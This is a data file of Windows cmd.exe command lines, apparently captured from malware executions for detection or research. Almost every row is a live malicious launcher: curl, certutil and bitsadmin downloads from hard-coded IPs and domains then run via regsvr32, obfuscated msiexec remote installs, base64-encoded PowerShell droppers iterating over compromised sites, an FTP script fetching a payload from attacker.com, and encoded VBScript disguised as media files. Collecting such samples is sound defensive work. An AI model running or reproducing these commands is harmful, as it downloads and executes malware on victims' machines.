"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /k ""C:\Program Files\winrar\rar.exe"" x -o+,- -r -y materials_for_cooperation*.rar C:\Users\user\AppData\Roaming & cd C:\Users\user\AppData\Roaming & ren crypto.jpg ).rar & start /wait winRAR x -o+,- -r -y -p312 ).rar C:\Users\user\AppData\Roaming & 1.vbs & exit","C:\Users\user\AppData\Roaming\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c ""RECYCLER.BIN\1\CEFHelper.exe 500 44""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c ""RECYCLER.BIN\1\CEFHelper.exe 727 71""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c curl -o C:\Users\user\AppData\Local\Temp\1.jpg -O http://111.90.151.235/082455.dat&&regsvr32 C:\Users\user\AppData\Local\Temp\1.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c curl -o C:\Users\user\AppData\Local\Temp\1.jpg -O http://141.98.169.72/056160.dat&&regsvr32 C:\Users\user\AppData\Local\Temp\1.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c curl -o C:\Users\user\AppData\Local\Temp\1.jpg -O http://141.98.169.72/461851.dat&&regsvr32 C:\Users\user\AppData\Local\Temp\1.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c curl -o C:\Users\user\AppData\Local\Temp\1.jpg -O http://194.36.191.243/469396.dat&&regsvr32 C:\Users\user\AppData\Local\Temp\1.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c curl -o C:\Users\user\AppData\Local\Temp\1.jpg -O http://87.236.146.97/015691.dat&&regsvr32 C:\Users\user\AppData\Local\Temp\1.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c curl -o C:\Users\user\AppData\Local\Temp\1.jpg -O http://87.236.146.97/323708.dat&&regsvr32 C:\Users\user\AppData\Local\Temp\1.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c curl -o C:\Users\user\AppData\Local\Temp\1.jpg -O http://95.179.137.172/993921.dat&&regsvr32 C:\Users\user\AppData\Local\Temp\1.jpg","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'BRYRD' && """"curl"""" -o C:\Users\user\AppData\Local\Temp\Hrop.OCX """"23.29.125.107/%random%.dat"""" && ping -n 2 """"localhost"""" && echo """"NTYUIK"""" && echo """"MERTIS"""" && """"regsvr32"""" """"C:\Users\user\AppData\Local\Temp\Hrop.OCX""""","C:\Windows\system32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'fbw' && echo ""jUk"" && ping 15.org && MD ""C:\Users\user\AppData\Roaming\cuIm\Yhq"" && curl.exe --output ""C:\Users\user\AppData\Roaming\cuIm\Yhq\Sdi.nJmp.qQx"" http://111.90.151.109/198569.dat && echo ""am8Z"" && regsvr32 ""C:\Users\user\AppData\Roaming\cuIm\Yhq\Sdi.nJmp.qQx","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'fbw' && echo ""jUk"" && ping 15.org && MD ""C:\Users\user\AppData\Roaming\cuIm\Yhq"" && curl.exe --output ""C:\Users\user\AppData\Roaming\cuIm\Yhq\Sdi.nJmp.qQx"" http://185.244.149.89/344351.dat && echo ""am8Z"" && regsvr32 ""C:\Users\user\AppData\Roaming\cuIm\Yhq\Sdi.nJmp.qQx","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'fbw' && echo ""jUk"" && ping 15.org && MD ""C:\Users\user\AppData\Roaming\cuIm\Yhq"" && curl.exe --output ""C:\Users\user\AppData\Roaming\cuIm\Yhq\Sdi.nJmp.qQx"" http://209.182.225.214/752113.dat && echo ""am8Z"" && regsvr32 ""C:\Users\user\AppData\Roaming\cuIm\Yhq\Sdi.nJmp.qQx","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'fbw' && echo ""jUk"" && ping 15.org && MD ""C:\Users\user\AppData\Roaming\cuIm\Yhq"" && curl.exe --output ""C:\Users\user\AppData\Roaming\cuIm\Yhq\Sdi.nJmp.qQx"" http://84.246.85.56/152051.dat && echo ""am8Z"" && regsvr32 ""C:\Users\user\AppData\Roaming\cuIm\Yhq\Sdi.nJmp.qQx","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c echo 'fbw' && echo ""jUk"" && ping 15.org && MD ""C:\Users\user\AppData\Roaming\cuIm\Yhq"" && curl.exe --output ""C:\Users\user\AppData\Roaming\cuIm\Yhq\Sdi.nJmp.qQx"" http://91.199.154.137/581968.dat && echo ""am8Z"" && regsvr32 ""C:\Users\user\AppData\Roaming\cuIm\Yhq\Sdi.nJmp.qQx","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c ping google.com && md C:\Users\user\AppData\Local\SOWIEabM && curl.exe -o C:\Users\user\AppData\Local\SOWIEabM\zBSpEocA.nls setecgt.com/BdMb7txB/M.png && start /IM regsvr32.exe -e C:\Users\user\AppData\Local\SOWIEabM\zBSpEocA.nls","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c type C:\Windows\system32\msh*.exe>C:\Users\Public\msh&ren C:\Users\Public\* *ta.exe&for %i IN (C:\Users\Public\ms*.exe) DO start /b %~ni ""https://file.fclouddown.co/LaZmDqvh+fDZnSFNG3FM4LjO79DWwaPJu0bC2cbC+6Y=""","C:\Windows\System32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c type C:\Windows\system32\msh*.exe>C:\Users\Public\msh&ren C:\Users\Public\* *ta.exe&for %i IN (C:\Users\Public\ms*.exe) DO start /b %~ni ""https://www.googlesheet.info/NZrTnPVmtfjcSMz8n1hZZzvHQvUUEfFnIMAYliQuR+A=""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /q /c type C:\Windows\system32\msh*.exe>C:\Users\Public\msh&ren C:\Users\Public\* *ta.exe&for %i IN (C:\Users\Public\ms*.exe) DO start /b %~ni ""https://www.googlesheet.info/reLRcLle7xPjTkmAhfQQNx8NLmc8qB8rqv4WAaPV9ZY=""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /qLwU/v/Y/rs^t^aR^T ^MSIEx^e^C ^vHT^hf^D=^yY -Q^n -^F^v ""HTTp://U0.Nz:8080/BEAqeov/Eibj/7sEquk/XlgNBW9n/6L/QHNiv/dj/eF/!compUternAME!"" O^m=NM^y^XVYq","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /r TYPE xAc.cHK|CMD","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /v/r tyPE ZfDkZ.cFG|!CoMSPeC!","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /v:on /c Cd+OWWCK4rMkVS600EeY2Ti5rXybVimwt2aTm4iZ9q3dISM3VXqLCs9xUoxyJ/ZEecPfRocF||p^o^w^e^r^s^h^e^l^l.e^x^e -c ""&{$MrMBk=[System.Text.Encoding]::ASCII;$gXA='ICAgICAgV3JpdGUtSG9zdCAiYUNTcVAiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9vbmctaGFuYW5lbC5vcmcvUEFRVUVTL1JjcWNualUvIiwiaHR0cDovL25ldHBhaW5lbC5jb20vbW9kdWxvcy9';$jcY='4Z0xDSDZvQlZGWjBvbWNlZUwvIiwiaHR0cHM6Ly9uZXdrYW5vLmNvbS93cC1hZG1pbi82RDQvIiwiaHR0cDovL25pZ2VyaWFuYW5nLmNvbS9wbHVnaW5zL1MzVXNDTVFoZjFEQkhUa2lTRW0vIiwiaHR0cHM6Ly93d3cubmV4b25vcnRlLmNvbS9yZWN1cnNvcy94bWwvZlNKRzR1SkJPanNUeHQvIiwiaHR0cHM6Ly9ub3Robmljay5ldS93cC1jb250ZW50L0hiM2UyM3gwOWZzNlBHLyIpOyR0PSJWbnluUUdkIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEZZeERDYVVpQnMuWFZMO1JlZ3N2cjMyLmV4ZSAiJGRcRll4RENhVWlCcy5YVkwiO2JyZWFrfSBjYXRjaCB7IH19';$oUT=[System.Convert]::FromBase64String($gXA+$jcY);$AGKcH=$MrMBk.GetString($oUT); iex ($AGKcH)}""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /v:on /c bHxtYBwCMS49ivTZKfRfkx622crR4BeVSOWhrYbtg0yQlMIy3Q9N/TtxAupNUJ14sDhwna1S||p^o^w^e^r^s^h^e^l^l.e^x^e -c ""&{$ZMFiiI=[System.Text.Encoding]::ASCII;$IQOhal='ICAgIFdyaXRlLUhvc3QgIk9HSVp4IjskUHJvZ3Jlc3NQcmVmZXJlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vb2NhbG9ndWxsYXJpLmNvbS9pbmMvcUZWYTd0em9iMmVRVGs1ZFdELyIsImh0';$aW='dHA6Ly9wZXJmZWN0Z3VhcmQuaHUvYm9hL2FmWjlRNFN1d3M3QXgvIiwiaHR0cDovL29nZW5odWt1ay5jb20vY3NzL1JZbklPZTluVTMvIiwiaHR0cDovL29uZXBpZWNlYXJrLmRvdGhvbWUuY28ua3IvandyL1EvIiwiaHR0cDovL3d3dy5uZXh0Y2FtcG9sYXJnby5jb20uYnIvY2dpLWJpbi9lZVU1SGhzY1oxMFk1TzJTcy8iLCJodHRwczovL3d3dy5vbGFmcy1yYWRsYWRlbi5kZS9jYXB0Y2hhL2lUTlJVdXNXWTNxTmxoQnBHLyIpOyR0PSJSWE11UE1XVFgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcVUhzbmNWR3RSZS5rVFY7UmVnc3ZyMzIuZXhlICIkZFxVSHNuY1ZHdFJlLmtUViI7YnJlYWt9IGNhdGNoIHsgfX0=';$KggH=[System.Convert]::FromBase64String($IQOhal+$aW);$LWOg=$ZMFiiI.GetString($KggH); iex ($LWOg)}""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /v:on /k start https://twinsec.de & bitsadmin /transfer rxYMJNpb /download /priority normal http://35.159.10.141/calc.exe C:\Users\user\AppData\Local\Temp\uUxqcC9s.exe & C:\Users\user\AppData\Local\Temp\uUxqcC9s","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /vZa/rStA^R^t M^S^i^exe^C /fv ""hTtp://0p.Rs:8080/BSArv8u89akrL69jep9wyoHJ/!ComPuTernamE!"" MJ^NV^c^z=^dQbHsQD -^Qn Tu=r^R^dI","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" ^/^c^ ^s^t^a^r^t^ Files.bat & ""Files\visor.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" cmd.exe /c powershell.exe curl.exe --output C:\Users\user\AppData\Local\Temp/loader.exe --url https://thinkforce.com.br/vsBuildTools & -w hidden C:\Users\user\AppData\Local\Temp/loader.exe","C:\Windows\System32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" cmd.exe /c powershell.exe curl.exe -w -w hidden --output C:\Users\user\AppData\Local\Temp/loader.exe --url https://thinkforce.com.br/vsBuildTools & C:\Users\user\AppData\Local\Temp/loader.exe","C:\Windows\System32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\CMD.EXE""
/C C:\Windows\system32\cmd.exe<hAlnera128.lnK:OR","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\Cmd.exe"" /c start WScript.exe /e:VBScript.Encode Video.3gp&CHcp&CHcp&CHcp&start ZEA"" ""EL"" ""PRO.png&CHcp&CHcp&CHcp&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\Cmd.exe"" /c start WScript.exe /e:VBScript.Encode Video.3gp&CHcp&CHcp&CHcp&start bok108.jpg&CHcp&CHcp&CHcp&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe""
/E/V/rCMD<XPHfk.Sav","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c s^t^A^rT ^M^si^E^xeC -^q-i""HTtp://3e.PM:8080/82sN8pVqVSj/HOST1=user""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" """"set a=ec && call powershell -Exec bypass -EncodedCommand 'YwBlAHIAdAB1AHIAaQBsAC4AZQB4AGUAIAAtAHUAcgBsAGMAYQBjAGgAZQAgAC0AZgAgAGgAdAB0AHAAcwA6AC8ALwB0AC4AbAB5AC8AdwAtAHIAdwAgACUAVABlAG0AcAAlAC8AYQAuAGUAeABlACAAJgAmACAAcwB0AGEAcgB0ACAAJQBUAGUAbQBwACUALwBhAC4AZQB4AGUAIAAmACYAIABjAGUAcgB0AHUAcgBpAGwALgBlAHgAZQAgAC0AdQByAGwAYwBhAGMAaABlACAALQBmACAAaAB0AHQAcABzADoALwAvAHQALgBsAHkALwB1AEoAdwBJADcAIAAlAFQAZQBtAHAAJQAvAGEALgBwAGQAZgAgACYAJgAgAHMAdABhAHIAdAAgACUAVABlAG0AcAAlAC8AYQAuAHAAZABmAA=='""""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" ""/c certutil.exe -urlcache -f https://t.ly/NLPT C:\Users\user\AppData\Local\Temp/a.docx && start C:\Users\user\AppData\Local\Temp/a.docx && certutil.exe -urlcache -f https://t.ly/NWqr C:\Users\user\AppData\Local\Temp/a.exe && start C:\Users\user\AppData\Local\Temp/a.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" ""/c start powershell -enCodEDComMAND YwBlAHIAdAB1AHIAaQBsAC4AZQB4AGUAIAAtAHUAcgBsAGMAYQBjAGgAZQAgAC0AZgAgAGgAdAB0AHAAcwA6AC8ALwB0AC4AbAB5AC8AdwAtAHIAdwAgACUAVABlAG0AcAAlAFwAYQAuAGUAeABlACAAJgAmACAAcwB0AGEAcgB0ACAAJQBUAGUAbQBwACUAXABhAC4AZQB4AGUAIAAmACYAIABjAGUAcgB0AHUAcgBpAGwALgBlAHgAZQAgAC0AdQByAGwAYwBhAGMAaABlACAALQBmACAAaAB0AHQAcABzADoALwAvAHQALgBsAHkALwB1AEoAdwBJADcAIAAlAFQAZQBtAHAAJQBcAGEALgBwAGQAZgAgACYAJgAgAHMAdABhAHIAdAAgACUAVABlAG0AcAAlAFwAYQAuAHAAZABmAA==""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" ""bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" ""cmd.exe /c ""@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v""""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /C start /b """" ""cmd.exe"" /C if exist ""..\..\..\Civil and Struct\OUT\040817sgba0322\rFQfXT.bdKx"" start /b """" ""..\..\..\Civil and Struct\OUT\040817sgba0322\rFQfXT.bdKx"" && start """" ""04sgb09 02930 HY-Lawns.doc""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /V /r ^sT^aRt MS^IExE^C /q/^I""HttP://fz.MS:8080/87e58GFPCeV/!CoMPutERNaME!=!UserNaMe!""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c ""powershell -enc bQBzAGgAdABhAC4AZQB4AGUAIABqAGEAdgBhAHMAYwByAGkAcAB0ADoAYQA9AEcAZQB0AE8AYgBqAGUAYwB0ACgAIgBzAGMAcgBpAHAAdAA6AGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8ATABPAEwAQgBBAFMALQBQAHIAbwBqAGUAYwB0AC8ATABPAEwAQgBBAFMALwBtAGEAcwB0AGUAcgAvAE8AUwBCAGkAbgBhAHIAaQBlAHMALwBQAGEAeQBsAG8AYQBkAC8ATQBzAGgAdABhAF8AYwBhAGwAYwAuAHMAYwB0ACIAKQAuAEUAeABlAGMAKAApADsAYwBsAG8AcwBlACgAKQA7AA==""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&start explorer ssss&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&start Microsoft"" ""Excel.WsF&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c cls&cls&cls&cls&cls&cls&cls&cls&start explorer 一年级上语文&cls&&cls&start notepad.vbe&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c cls&cls&cls&cls&cls&cls&cls&cls&start explorer 一年级下&cls&&cls&start notepad.vbe&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c cls&cls&cls&cls&cls&cls&cls&cls&start explorer 家访照片&cls&&cls&start notepad.vbe&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c cls&cls&cls&cls&cls&cls&cls&cls&start explorer 电影&cls&&cls&start notepad.vbe&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c cls&cls&cls&cls&cls&cls&cls&cls&start explorer 胡营思想政治工作者材料&cls&&cls&start notepad.vbe&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c cls&cls&cls&cls&cls&cls&cls&start p.mp4.baiduyun.downloading.cfg&cls&cls&cls&cls&cls&cls&start notepad.vbe&cls&cls&cls&cls&cls&cls&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c cls&cls&cls&cls&cls&cls&cls&start 二四核酸检测表格.xlsx&cls&cls&cls&cls&cls&cls&start notepad.vbe&cls&cls&cls&cls&cls&cls&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c cls&cls&cls&cls&cls&cls&cls&start 原地左右手交替运球.mp4&cls&cls&cls&cls&cls&cls&start notepad.vbe&cls&cls&cls&cls&cls&cls&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c cls&cls&cls&cls&cls&cls&cls&start 语文园地一.pptx&cls&cls&cls&cls&cls&cls&start notepad.vbe&cls&cls&cls&cls&cls&cls&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c cls&cls&cls&cls&cls&cls&cls&start 辅导计划.doc&cls&cls&cls&cls&cls&cls&start notepad.vbe&cls&cls&cls&cls&cls&cls&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c cls&cls&cls&cls&cls&cls&cls&start 运球.mp4&cls&cls&cls&cls&cls&cls&start notepad.vbe&cls&cls&cls&cls&cls&cls&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""PerfLogs"" & type ""2c4aeb15-b895-d674-389e-7a49e9c68834.exe"" > ""C:\Users\user\AppData\Local\Temp\2c4aeb15-b895-d674-389e-7a49e9c68834.exe"" & start ""PerfLogs"" ""C:\Users\user\AppData\Local\Temp\2c4aeb15-b895-d674-389e-7a49e9c68834.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""PerfLogs"" & type ""6cb4a6a0-d8b8-3887-4f12-286baf8f5c37.exe"" > ""C:\Users\user\AppData\Local\Temp\6cb4a6a0-d8b8-3887-4f12-286baf8f5c37.exe"" & start ""PerfLogs"" ""C:\Users\user\AppData\Local\Temp\6cb4a6a0-d8b8-3887-4f12-286baf8f5c37.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""PerfLogs"" & type ""8a0bf243-11db-5b73-d5a7-119e5e6dd803.exe"" > ""C:\Users\user\AppData\Local\Temp\8a0bf243-11db-5b73-d5a7-119e5e6dd803.exe"" & start ""PerfLogs"" ""C:\Users\user\AppData\Local\Temp\8a0bf243-11db-5b73-d5a7-119e5e6dd803.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""PerfLogs"" & type ""dccbd8dc-2a0f-94b8-5178-0c6ab94e4af4.exe"" > ""C:\Users\user\AppData\Local\Temp\dccbd8dc-2a0f-94b8-5178-0c6ab94e4af4.exe"" & start ""PerfLogs"" ""C:\Users\user\AppData\Local\Temp\dccbd8dc-2a0f-94b8-5178-0c6ab94e4af4.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""Program Files (x86)"" & type ""2c4aeb15-b895-d674-389e-7a49e9c68834.exe"" > ""C:\Users\user\AppData\Local\Temp\2c4aeb15-b895-d674-389e-7a49e9c68834.exe"" & start ""Program Files (x86)"" ""C:\Users\user\AppData\Local\Temp\2c4aeb15-b895-d674-389e-7a49e9c68834.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""Program Files (x86)"" & type ""6cb4a6a0-d8b8-3887-4f12-286baf8f5c37.exe"" > ""C:\Users\user\AppData\Local\Temp\6cb4a6a0-d8b8-3887-4f12-286baf8f5c37.exe"" & start ""Program Files (x86)"" ""C:\Users\user\AppData\Local\Temp\6cb4a6a0-d8b8-3887-4f12-286baf8f5c37.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""Program Files (x86)"" & type ""8a0bf243-11db-5b73-d5a7-119e5e6dd803.exe"" > ""C:\Users\user\AppData\Local\Temp\8a0bf243-11db-5b73-d5a7-119e5e6dd803.exe"" & start ""Program Files (x86)"" ""C:\Users\user\AppData\Local\Temp\8a0bf243-11db-5b73-d5a7-119e5e6dd803.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""Program Files"" & type ""2c4aeb15-b895-d674-389e-7a49e9c68834.exe"" > ""C:\Users\user\AppData\Local\Temp\2c4aeb15-b895-d674-389e-7a49e9c68834.exe"" & start ""Program Files"" ""C:\Users\user\AppData\Local\Temp\2c4aeb15-b895-d674-389e-7a49e9c68834.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""Program Files"" & type ""6cb4a6a0-d8b8-3887-4f12-286baf8f5c37.exe"" > ""C:\Users\user\AppData\Local\Temp\6cb4a6a0-d8b8-3887-4f12-286baf8f5c37.exe"" & start ""Program Files"" ""C:\Users\user\AppData\Local\Temp\6cb4a6a0-d8b8-3887-4f12-286baf8f5c37.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""Program Files"" & type ""8a0bf243-11db-5b73-d5a7-119e5e6dd803.exe"" > ""C:\Users\user\AppData\Local\Temp\8a0bf243-11db-5b73-d5a7-119e5e6dd803.exe"" & start ""Program Files"" ""C:\Users\user\AppData\Local\Temp\8a0bf243-11db-5b73-d5a7-119e5e6dd803.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""Program Files"" & type ""dccbd8dc-2a0f-94b8-5178-0c6ab94e4af4.exe"" > ""C:\Users\user\AppData\Local\Temp\dccbd8dc-2a0f-94b8-5178-0c6ab94e4af4.exe"" & start ""Program Files"" ""C:\Users\user\AppData\Local\Temp\dccbd8dc-2a0f-94b8-5178-0c6ab94e4af4.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""Temp"" & type ""2c4aeb15-b895-d674-389e-7a49e9c68834.exe"" > ""C:\Users\user\AppData\Local\Temp\2c4aeb15-b895-d674-389e-7a49e9c68834.exe"" & start ""Temp"" ""C:\Users\user\AppData\Local\Temp\2c4aeb15-b895-d674-389e-7a49e9c68834.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""Temp"" & type ""6cb4a6a0-d8b8-3887-4f12-286baf8f5c37.exe"" > ""C:\Users\user\AppData\Local\Temp\6cb4a6a0-d8b8-3887-4f12-286baf8f5c37.exe"" & start ""Temp"" ""C:\Users\user\AppData\Local\Temp\6cb4a6a0-d8b8-3887-4f12-286baf8f5c37.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""Temp"" & type ""8a0bf243-11db-5b73-d5a7-119e5e6dd803.exe"" > ""C:\Users\user\AppData\Local\Temp\8a0bf243-11db-5b73-d5a7-119e5e6dd803.exe"" & start ""Temp"" ""C:\Users\user\AppData\Local\Temp\8a0bf243-11db-5b73-d5a7-119e5e6dd803.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""Temp"" & type ""dccbd8dc-2a0f-94b8-5178-0c6ab94e4af4.exe"" > ""C:\Users\user\AppData\Local\Temp\dccbd8dc-2a0f-94b8-5178-0c6ab94e4af4.exe"" & start ""Temp"" ""C:\Users\user\AppData\Local\Temp\dccbd8dc-2a0f-94b8-5178-0c6ab94e4af4.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""Windows"" & type ""2c4aeb15-b895-d674-389e-7a49e9c68834.exe"" > ""C:\Users\user\AppData\Local\Temp\2c4aeb15-b895-d674-389e-7a49e9c68834.exe"" & start ""Windows"" ""C:\Users\user\AppData\Local\Temp\2c4aeb15-b895-d674-389e-7a49e9c68834.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\system32\cmd.exe"" /c explorer.exe ""Windows"" & type ""6cb4a6a0-d8b8-3887-4f12-286baf8f5c37.exe"" > ""C:\Users\user\AppData\Local\Temp\6cb4a6a0-d8b8-3887-4f12-286baf8f5c37.exe"" & start ""Windows"" ""C:\Users\user\AppData\Local\Temp\6cb4a6a0-d8b8-3887-4f12-286baf8f5c37.exe""","C:\Users\user\Desktop\",1
